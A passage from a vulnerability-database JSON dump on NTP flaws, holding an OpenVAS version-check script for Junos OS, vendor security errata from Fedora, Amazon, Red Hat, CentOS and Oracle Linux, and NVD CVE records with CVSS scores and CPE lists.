"http://plugins.openvas.org/nasl.php?oid=1361412562310106754", "type": "openvas", "title": "Junos Multiple NTP Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_junos_jsa10776.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Junos Multiple NTP Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/o:juniper:junos';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106754\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-13 08:24:49 +0200 (Thu, 13 Apr 2017)\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n\n script_cve_id(\"CVE-2016-9311\", \"CVE-2016-9310\", \"CVE-2015-7973\", \"CVE-2015-7979\", \"CVE-2016-7431\",\n\"CVE-2015-8158\", \"CVE-2016-7429\", \"CVE-2016-7427\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Junos Multiple NTP Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_family(\"JunOS Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_ssh_junos_get_version.nasl\", \"gb_junos_snmp_version.nasl\");\n script_mandatory_keys(\"Junos/Version\");\n\n script_tag(name:\"summary\", value:\"Junos OS is prone to multiple vulnerabilities in NTP.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable OS build is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"NTP.org and FreeBSD have published security advisories for vulnerabilities\nresolved in ntpd which impact Junos OS.\");\n\n script_tag(name:\"affected\", value:\"Junos OS 12.3X48, 14.1, 14.2, 15.1, 16.1 and 16.2\");\n\n script_tag(name:\"solution\", value:\"New builds of Junos OS software are available from Juniper.\");\n\n script_xref(name:\"URL\", value:\"http://kb.juniper.net/JSA10776\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE, nofork: TRUE))\n exit(0);\n\nif (version =~ \"^12\") {\n if ((revcomp(a: version, b: \"12.3X48-D45\") < 0) &&\n (revcomp(a: version, b: \"12.3X48\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"12.3X48-D45\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^14\") {\n if (revcomp(a: version, b: \"14.1R8-S3\") < 0) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"14.1R8-S3\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"14.2R7-S6\") < 0) &&\n (revcomp(a: version, b: \"14.2\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"14.2R7-S6\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^15\") {\n if ((revcomp(a: version, b: \"15.1F7\") < 0) &&\n (revcomp(a: version, b: \"15.1F\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.1F7\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"15.1R6\") < 0) &&\n (revcomp(a: version, b: \"15.1R\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.1R6\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"15.1X49-D80\") < 0) &&\n (revcomp(a: version, b: \"15.1X49\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"15.1X49-D80\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^16\") {\n if (revcomp(a: version, b: \"16.1R3-S3\") < 0) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"16.1R3-S3\");\n security_message(port: 0, data: report);\n exit(0);\n }\n else if ((revcomp(a: version, b: \"16.2R1-S3\") < 0) &&\n (revcomp(a: version, b: \"16.2\") >= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"16.2R1-S3\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7426", "CVE-2016-7429", "CVE-2016-7433", "CVE-2016-9310", "CVE-2016-9311"], "description": "The Network Time Protocol (NTP) is used to synchronize a computer's time with another reference time source. This package includes ntpd (a daemon which continuously adjusts system time) and utilities used to query and configure the ntpd daemon. Perl scripts ntp-wait and ntptrace are in the ntp-perl package, ntpdate is in the ntpdate package and sntp is in the sntp package. The documentation is in the ntp-doc package. ", "modified": "2016-12-07T20:21:32", "published": "2016-12-07T20:21:32", "id": "FEDORA:012B26015E2A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: ntp-4.2.6p5-43.fc24", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7426", "CVE-2016-7429", "CVE-2016-7433", "CVE-2016-9310", "CVE-2016-9311"], "description": "The Network Time Protocol (NTP) is used to synchronize a computer's time with another reference time source. This package includes ntpd (a daemon which continuously adjusts system time) and utilities used to query and configure the ntpd daemon. Perl scripts ntp-wait and ntptrace are in the ntp-perl package, ntpdate is in the ntpdate package and sntp is in the sntp package. The documentation is in the ntp-doc package. ", "modified": "2016-12-08T03:53:53", "published": "2016-12-08T03:53:53", "id": "FEDORA:457C1608C014", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: ntp-4.2.6p5-43.fc25", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7426", "CVE-2016-7429", "CVE-2016-7433", "CVE-2016-9310", "CVE-2016-9311"], "description": "The Network Time Protocol (NTP) is used to synchronize a computer's time with another reference time source. This package includes ntpd (a daemon which continuously adjusts system time) and utilities used to query and configure the ntpd daemon. Perl scripts ntp-wait and ntptrace are in the ntp-perl package, ntpdate is in the ntpdate package and sntp is in the sntp package. The documentation is in the ntp-doc package. ", "modified": "2016-12-08T03:20:50", "published": "2016-12-08T03:20:50", "id": "FEDORA:9160C605D560", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: ntp-4.2.6p5-43.fc23", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:36:32", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7426"], "description": "**Issue Overview:**\n\nThe following security-related issues were resolved:\n\n[CVE-2016-7426 __](<https://access.redhat.com/security/cve/CVE-2016-7426>): Client rate limiting and server responses \n[CVE-2016-7429 __](<https://access.redhat.com/security/cve/CVE-2016-7429>): Attack on interface selection \n[CVE-2016-7433 __](<https://access.redhat.com/security/cve/CVE-2016-7433>): Broken initial sync calculations regression \n[CVE-2016-9310 __](<https://access.redhat.com/security/cve/CVE-2016-9310>): Mode 6 unauthenticated trap information disclosure and DDoS vector \n[CVE-2016-9311 __](<https://access.redhat.com/security/cve/CVE-2016-9311>): Null pointer dereference when trap service is enabled \n\n\n \n**Affected Packages:** \n\n\nntp\n\n \n**Issue Correction:** \nRun _yum update ntp_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n ntpdate-4.2.6p5-43.33.amzn1.i686 \n ntp-4.2.6p5-43.33.amzn1.i686 \n ntp-debuginfo-4.2.6p5-43.33.amzn1.i686 \n \n noarch: \n ntp-perl-4.2.6p5-43.33.amzn1.noarch \n ntp-doc-4.2.6p5-43.33.amzn1.noarch \n \n src: \n ntp-4.2.6p5-43.33.amzn1.src \n \n x86_64: \n ntp-4.2.6p5-43.33.amzn1.x86_64 \n ntp-debuginfo-4.2.6p5-43.33.amzn1.x86_64 \n ntpdate-4.2.6p5-43.33.amzn1.x86_64 \n \n \n", "edition": 3, "modified": "2017-01-04T17:00:00", "published": "2017-01-04T17:00:00", "id": "ALAS-2017-781", "href": "https://alas.aws.amazon.com/ALAS-2017-781.html", "title": "Medium: ntp", "type": "amazon", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:26", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7426", "CVE-2016-7429", "CVE-2016-7433", "CVE-2016-9310", "CVE-2016-9311"], "description": "The Network Time Protocol (NTP) is used to synchronize a computer's time with another referenced time source. These packages include the ntpd service which continuously adjusts system time and utilities used to query and configure the ntpd service.\n\nSecurity Fix(es):\n\n* It was found that when ntp is configured with rate limiting for all associations the limits are also applied to responses received from its configured sources. A remote attacker who knows the sources can cause a denial of service by preventing ntpd from accepting valid responses from its sources. (CVE-2016-7426)\n\n* A flaw was found in the control mode functionality of ntpd. A remote attacker could send a crafted control mode packet which could lead to information disclosure or result in DDoS amplification attacks. (CVE-2016-9310)\n\n* A flaw was found in the way ntpd implemented the trap service. A remote attacker could send a specially crafted packet to cause a null pointer dereference that will crash ntpd, resulting in a denial of service. (CVE-2016-9311)\n\n* A flaw was found in the way ntpd running on a host with multiple network interfaces handled certain server responses. A remote attacker could use this flaw which would cause ntpd to not synchronize with the source. (CVE-2016-7429)\n\n* A flaw was found in the way ntpd calculated the root delay. A remote attacker could send a specially-crafted spoofed packet to cause denial of service or in some special cases even crash. (CVE-2016-7433)", "modified": "2018-06-06T20:24:18", "published": "2017-02-06T08:59:03", "id": "RHSA-2017:0252", "href": "https://access.redhat.com/errata/RHSA-2017:0252", "type": "redhat", "title": "(RHSA-2017:0252) Moderate: ntp security update", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "centos": [{"lastseen": "2020-12-08T03:38:15", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7426"], "description": "**CentOS Errata and Security Advisory** CESA-2017:0252\n\n\nThe Network Time Protocol (NTP) is used to synchronize a computer's time with another referenced time source. These packages include the ntpd service which continuously adjusts system time and utilities used to query and configure the ntpd service.\n\nSecurity Fix(es):\n\n* It was found that when ntp is configured with rate limiting for all associations the limits are also applied to responses received from its configured sources. A remote attacker who knows the sources can cause a denial of service by preventing ntpd from accepting valid responses from its sources. (CVE-2016-7426)\n\n* A flaw was found in the control mode functionality of ntpd. A remote attacker could send a crafted control mode packet which could lead to information disclosure or result in DDoS amplification attacks. (CVE-2016-9310)\n\n* A flaw was found in the way ntpd implemented the trap service. A remote attacker could send a specially crafted packet to cause a null pointer dereference that will crash ntpd, resulting in a denial of service. (CVE-2016-9311)\n\n* A flaw was found in the way ntpd running on a host with multiple network interfaces handled certain server responses. A remote attacker could use this flaw which would cause ntpd to not synchronize with the source. (CVE-2016-7429)\n\n* A flaw was found in the way ntpd calculated the root delay. A remote attacker could send a specially-crafted spoofed packet to cause denial of service or in some special cases even crash. (CVE-2016-7433)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-February/034304.html\nhttp://lists.centos.org/pipermail/centos-announce/2017-February/034305.html\n\n**Affected packages:**\nntp\nntp-doc\nntp-perl\nntpdate\nsntp\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2017-0252.html", "edition": 4, "modified": "2017-02-06T12:22:53", "published": "2017-02-06T11:25:17", "href": "http://lists.centos.org/pipermail/centos-announce/2017-February/034304.html", "id": "CESA-2017:0252", "title": "ntp, ntpdate, sntp security update", "type": "centos", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:43", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7426"], "description": "[4.2.6p5-25.0.1.el7_3.1]\n- Bump release to avoid ULN conflict with Oracle modified errata.\n[4.2.6p5-25.el7_3.1]\n- don't limit rate of packets from sources (CVE-2016-7426)\n- don't change interface from received packets (CVE-2016-7429)\n- fix calculation of root distance again (CVE-2016-7433)\n- require authentication for trap commands (CVE-2016-9310)\n- fix crash when reporting peer event to trappers (CVE-2016-9311)", "edition": 4, "modified": "2017-02-06T00:00:00", "published": "2017-02-06T00:00:00", "id": "ELSA-2017-0252", "href": "http://linux.oracle.com/errata/ELSA-2017-0252.html", "title": "ntp security update", "type": "oraclelinux", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-10-22T17:08:32", "bulletinFamily": "unix", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2017-6462", "CVE-2016-7429", "CVE-2017-6463", "CVE-2016-9310", "CVE-2017-6464", "CVE-2016-7426"], "description": "[4.2.6p5-28.0.1]\n- Bump release to avoid ULN conflict with Oracle modified errata.\n[4.2.6p5-28]\n- fix buffer overflow in datum refclock driver (CVE-2017-6462)\n- fix crash with invalid unpeer command (CVE-2017-6463)\n- fix potential crash with invalid server command (CVE-2017-6464)\n- add Spectracom TSYNC driver (#1491797)\n- fix initialization of system clock status (#1493452)\n- fix typos in ntpd man page (#1420453)\n- use SHA1 request key by default (#1442083)\n- use network-online target in ntpdate and sntp services (#1466947)\n[4.2.6p5-27]\n- fix CVE-2016-7429 patch to work correctly on multicast client (#1422944)\n[4.2.6p5-26]\n- don't limit rate of packets from sources (CVE-2016-7426)\n- don't change interface from received packets (CVE-2016-7429)\n- fix calculation of root distance again (CVE-2016-7433)\n- require authentication for trap commands (CVE-2016-9310)\n- fix crash when reporting peer event to trappers (CVE-2016-9311)", "edition": 5, "modified": "2018-04-16T00:00:00", "published": "2018-04-16T00:00:00", "id": "ELSA-2018-0855", "href": "http://linux.oracle.com/errata/ELSA-2018-0855.html", "title": "ntp security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "cve": [{"lastseen": "2020-10-03T12:10:50", "description": "NTP before 4.2.8p9 allows remote attackers to bypass the origin timestamp protection mechanism via an origin timestamp of zero. NOTE: this vulnerability exists because of a CVE-2015-8138 regression.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2017-01-13T16:59:00", "title": "CVE-2016-7431", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7431"], "modified": "2018-11-08T11:29:00", "cpe": ["cpe:/a:ntp:ntp:4.2.8"], "id": "CVE-2016-7431", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7431", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:10:50", "description": "ntpd in NTP before 4.2.8p9 allows remote attackers to cause a denial of service (reject broadcast mode packets) via the poll interval in a broadcast packet.", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2017-01-13T16:59:00", "title": "CVE-2016-7428", "type": "cve", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.3, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7428"], "modified": "2019-01-24T11:29:00", "cpe": ["cpe:/a:ntp:ntp:4.2.8"], "id": "CVE-2016-7428", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7428", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p7:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p6:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:07:42", "description": "The read_mru_list function in NTP before 4.2.8p9 allows remote attackers to cause a denial of service (crash) via a crafted mrulist query.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2017-01-13T16:59:00", "title": "CVE-2016-7434", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7434"], "modified": "2020-06-18T18:20:00", "cpe": ["cpe:/a:ntp:ntp:4.2.8", "cpe:/a:ntp:ntp:4.2.7"], "id": "CVE-2016-7434", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7434", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.7:p333:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p312:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p405:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p242:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p279:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p426:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p317:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p107:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p4:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p423:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p193:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p441:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p454:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p349:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p311:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p56:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p382:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p8:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p4:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p199:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p27:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p417:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p338:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p362:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p66:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p249:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p444:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p461:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p239:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p466:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p440:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p371:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p91:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p38:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p419:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p247:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p414:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p61:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p357:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p306:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p485_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p126:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p232:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p220:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p477:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p437:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p178:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p222:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p256:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p398:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p254:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p277:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p140:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p424:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p225:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p44:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p93:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p231:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p185:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p96:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p283:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-beta1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p374:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p267:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p252:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p48:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p240:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p246:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p291:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p451:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p462:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p383:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p278:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p224:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p321:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p71:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p455:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p290:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p459:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p482:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p300:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p29:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p117:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p354:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p43:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p51:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p132:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p285:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p476:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p173:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p114:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p484_rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p3:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p343:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p192:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p365:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p367:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p227:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p82:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p433:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p328:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p472:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p134:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p387:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.8:p1-rc1:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p377:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p251:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p95:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p391:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p7:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p194:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p404:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p310:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.7:p153:*:*:*:*:*:*", 